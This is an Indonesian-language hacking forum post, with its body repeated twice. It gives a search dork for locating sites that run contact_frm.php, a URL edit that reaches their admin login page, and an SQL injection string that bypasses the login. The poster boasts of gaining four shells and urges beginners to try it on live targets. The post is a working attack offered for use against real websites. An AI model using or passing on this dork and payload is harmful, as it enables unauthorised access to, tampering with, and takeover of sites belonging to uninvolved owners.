Pencarian
Community Patner
Hosting Free
User Yang Sedang Online
Total 3 uses online :: 0 Terdaftar, 0 Tersembunyi dan 3 Tamu Tidak ada
User online terbanyak adalah 18 pada Thu Apr 06, 2023 10:11 pm
Statistics
Total 215 user terdaftarUser terdaftar terakhir adalah skreyv
Total 75 kiriman artikel dari user in 35 subjects
Sqli inurl:contact_frm.php
Halaman 1 dari 1
Sqli inurl:contact_frm.php
by Administrator Sat Mar 26, 2011 12:11 pm
Halo kk ane seorang yang sangad newbie pengen show off dikit
sebelumnya neh POC nya
Dork : inurl:contact_frm.php
setelah itu jika kk ud nemu target misal Http://site.com/contact_frm.php nah kk Hapus aja tuh contact_frm.php trus ganti amaControl Example : Http://site.com/contact_frm.php di rubah jadi http://site.com/Control ( intinya Contact_frm.php nya aja yang di Hapus misal ada web seperti Http://site.com/Reci...contact_frm.php <<<< nah ini hapus aja langsung Contact_frm.php trus ganti ama control )
nah bis itu kan ud masuk tuh ke halaman admin login nya sekarang kk masukin ini:
Login : admin ' or ' 1=1 & or & ' or 1='1'#
password : xx
itu yang gw bold isikan ke Login ama Passwordnya, nah bis itu ud deh kk ud masuk ke halaman admin tinggal edit2 aja yang kk mau hehehe..
mayan kk ane dapat 4 shell kwkwkwk walaupun dork lama tp amsih bnyk yang vuln Posted Image
Saya yakin para master disini sudah pada tau Dork ini mungkin ada yang bilang ud basi tp gpp ane hanya share aja buat temen2 yang masih newbie seperti saya ..heheheh REAL Credit = [Forum Tetangga]
sebelumnya neh POC nya
Dork : inurl:contact_frm.php
setelah itu jika kk ud nemu target misal Http://site.com/contact_frm.php nah kk Hapus aja tuh contact_frm.php trus ganti amaControl Example : Http://site.com/contact_frm.php di rubah jadi http://site.com/Control ( intinya Contact_frm.php nya aja yang di Hapus misal ada web seperti Http://site.com/Reci...contact_frm.php <<<< nah ini hapus aja langsung Contact_frm.php trus ganti ama control )
nah bis itu kan ud masuk tuh ke halaman admin login nya sekarang kk masukin ini:
Login : admin ' or ' 1=1 & or & ' or 1='1'#
password : xx
itu yang gw bold isikan ke Login ama Passwordnya, nah bis itu ud deh kk ud masuk ke halaman admin tinggal edit2 aja yang kk mau hehehe..
mayan kk ane dapat 4 shell kwkwkwk walaupun dork lama tp amsih bnyk yang vuln Posted Image
Saya yakin para master disini sudah pada tau Dork ini mungkin ada yang bilang ud basi tp gpp ane hanya share aja buat temen2 yang masih newbie seperti saya ..heheheh REAL Credit = [Forum Tetangga]
Administrator- Administrators
- Jumlah posting : 23
Reputation : 1
Join date : 16.03.11
Age : 36
Lokasi : ACP -
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik|
|
|